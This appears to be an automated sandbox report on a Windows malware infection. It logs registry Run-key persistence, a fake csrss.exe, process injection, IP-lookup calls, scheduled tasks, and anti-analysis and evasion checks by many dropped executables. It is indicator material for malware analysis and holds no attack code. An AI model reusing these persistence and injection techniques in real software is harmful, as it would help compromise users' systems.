Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\Pictures\Adobe Films\CzOCCnZhsTntOC1DD4Afra50.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\Pictures\Adobe Films\mNDcgp0zrWGy_iR_gqWvo4tt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\Pictures\Adobe Films\mNDcgp0zrWGy_iR_gqWvo4tt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\Pictures\Adobe Films\FnPK_uULTBfwZezEEGCXaVE6.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\Pictures\Adobe Films\FnPK_uULTBfwZezEEGCXaVE6.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A checkip.amazonaws.com N/A N/A
N/A ipinfo.io N/A N/A
N/A api.2ip.ua N/A N/A
N/A ip-api.com N/A N/A
N/A api.2ip.ua N/A N/A
N/A ipinfo.io N/A N/A
N/A api.2ip.ua N/A N/A
N/A checkip.amazonaws.com N/A N/A
N/A api.2ip.ua N/A N/A
N/A ipinfo.io N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A ipinfo.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\EdLqPAaTytMGRMX\SVjvbHJ.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zSE536.tmp\Install.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\EdLqPAaTytMGRMX\SVjvbHJ.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3620 set thread context of 4196 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe
PID 3964 set thread context of 4552 N/A C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe
PID 3232 set thread context of 3840 N/A C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe C:\Users\Admin\Pictures\Adobe Films\_az72zCJh0iBWr5dTACKXrws.exe
PID 2616 set thread context of 4688 N/A C:\Users\Admin\AppData\Local\Temp\M52CB.exe C:\Windows\system32\RunDll32.exe
PID 3784 set thread context of 4204 N/A C:\Users\Admin\AppData\Local\Temp\0BB4J.exe C:\Users\Admin\AppData\Local\Temp\0BB4J.exe
PID 4324 set thread context of 5224 N/A C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab\kdnmdIr2m3Z75rmoxMQY45zR.exe C:\Users\Admin\AppData\Local\72bf7303-5dc0-44e9-87d8-698f8677acab\kdnmdIr2m3Z75rmoxMQY45zR.exe
PID 5584 set thread context of 5716 N/A C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe
PID 3704 set thread context of 3516 N/A C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe
PID 4116 set thread context of 5624 N/A C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe
PID 4960 set thread context of 5984 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXE C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1260 set thread context of 5340 N/A C:\Users\Admin\AppData\Local\Temp\4A1B.exe C:\Users\Admin\AppData\Local\Temp\4A1B.exe
PID 3880 set thread context of 6076 N/A C:\Users\Admin\AppData\Local\Temp\4A1B.exe C:\Users\Admin\AppData\Local\Temp\4A1B.exe
PID 4980 set thread context of 3760 N/A C:\Users\Admin\AppData\Local\09dfb731-f846-4759-8506-2a169e20e63b\build2.exe C:\Users\Admin\AppData\Local\09dfb731-f846-4759-8506-2a169e20e63b\build2.exe
PID 4944 set thread context of 4344 N/A C:\Users\Admin\AppData\Local\Temp\CE07.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 4452 set thread context of 3972 N/A C:\Users\Admin\AppData\Local\Temp\3A8A.exe C:\Users\Admin\AppData\Local\Temp\3A8A.exe
PID 4904 set thread context of 109088 N/A C:\Users\Admin\AppData\Local\Temp\F576.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3180 set thread context of 1180 N/A C:\Users\Admin\AppVerif\DllHelper.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 109144 set thread context of 5356 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif
PID 109296 set thread context of 1164 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe C:\Users\Admin\Pictures\Adobe Films\1hObAWF58hoo9_jA8jPWtwDx.exe N/A
File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe C:\Users\Admin\Pictures\Adobe Films\1hObAWF58hoo9_jA8jPWtwDx.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\raBkRkUFhLhqVOsAt.job C:\Windows\SysWOW64\schtasks.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
File created C:\Windows\Tasks\bamNpdvhtkzLwlCraC.job C:\Windows\SysWOW64\schtasks.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Kog456fPoi_qlj0gOuQ1ue72.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\wd1PHHYFXTO2GwSbYNeKiEhd.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\50543188494393494002.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe
N/A N/A C:\Windows\system32\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\tmRoymsFOt7qgiIyaQJKTG0D.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Pictures\Adobe Films\Ju38t3w5U8IOhBMX5rcSC6Nn.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\explorer.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\explorer.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\987E.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\FB35.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\Itvrzxmax2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\Itvrzxmax2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\6DF1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\8AF1.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\8AF1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\Itvrzxmax2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\6DF1.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\6DF1.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\8AF1.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Pictures\Adobe Films\FzbLA0y21wf4Eb_GXZGPAkPK.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\41d357c0-b3ba-4dab-aeaa-886a78efcdac\build2.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Pictures\Adobe Films\l2S7FrWODIlvtiOh9PM4XNlS.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zSE536.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zSE536.tmp\Install.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Users\Admin\AppData\Local\Temp\3A2F1MAI23B9J52.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Users\Admin\AppData\Local\Temp\3A2F1MAI23B9J52.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Users\Admin\AppData\Local\Temp\3A2F1MAI23B9J52.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Users\Admin\AppData\Local\Temp\3A2F1MAI23B9J52.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Internet Explorer\Toolbar N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser N/A N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time" C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe N/A
